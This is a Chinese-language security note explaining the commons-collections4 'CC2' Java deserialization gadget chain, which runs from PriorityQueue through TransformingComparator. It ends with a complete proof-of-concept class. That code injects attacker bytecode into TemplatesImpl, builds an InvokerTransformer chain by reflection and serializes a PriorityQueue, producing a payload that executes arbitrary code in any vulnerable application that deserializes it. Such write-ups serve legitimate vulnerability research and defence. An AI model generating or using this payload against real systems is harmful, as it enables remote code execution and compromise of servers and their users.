基于 commons-collections4
    核心是 java.util.PriorityQueue 和 org.apache.commons.collections4.comparators.TransformingComparator
    PriorityQueue 顾名思义是一个优先级队列,他有如下特质:

    1. 拥有readObject方法
    2. 在readObject时会将队列元素有序排列
      1. 就会有如下的调用, 最终会调用到一个compartor.

    heapify() -> siftDown() -> siftDownUsingComparator() -> comparator.compare()

    TransformingComparator 就是一个comparator, 并且可以序列化,
    image.png
    看其名字是与transform有关的, 可以发现在其compare方法中会调用到 this.transformer.transform(obj1)
    image.png
    这样就不难理解这个链了, 构造恶意的transformers链然后放到TransformingComparator, 再把PriorityQueue的比较器设置为恶意的Comparator即可.
    完整POC:

    1. package test.com.cc;
    4. import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
    5. import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
    6. import javassist.ClassPool;
    7. import javassist.CtClass;
    8. import org.apache.commons.collections4.Transformer;
    9. import org.apache.commons.collections4.functors.ChainedTransformer;
    10. import org.apache.commons.collections4.functors.ConstantTransformer;
    11. import org.apache.commons.collections4.functors.InvokerTransformer;
    12. import test.com.Reflections;
    14. import java.util.PriorityQueue;
    15. import org.apache.commons.collections4.comparators.TransformingComparator;
    16. import test.com.Serializer;
    18. public class cc2 {
    19.     public static byte[] payload() throws Exception{
    20.         ClassPool pool = ClassPool.getDefault();
    21.         CtClass ct = pool.get(bad.evilClz.class.getName());
    22.         byte[] shellcode = ct.toBytecode();
    24.         TemplatesImpl tmpl = new TemplatesImpl();
    25.         Reflections.setFieldValue(tmpl,"_bytecodes",new byte[][] {shellcode});
    26.         Reflections.setFieldValue(tmpl,"_name","testName");
    27.         Reflections.setFieldValue(tmpl,"_tfactory",new TransformerFactoryImpl());
    28.         Transformer[] transformers = new Transformer[]{
    29.                 new ConstantTransformer(tmpl),
    30.                 new InvokerTransformer("newTransformer",null,null),
    31.         };
    32.         Transformer transformerChain = new ChainedTransformer(new Transformer[]{});
    34.         TransformingComparator tc = new TransformingComparator(transformerChain);
    35.         PriorityQueue pq = new PriorityQueue(100,tc);
    36.         pq.add(1);
    37.         pq.add(1);
    38.         pq.add(1);
    39.         Reflections.setFieldValue(transformerChain,"iTransformers",transformers);
    40.         return Serializer.Serialize(pq);
    41.     }
    42. }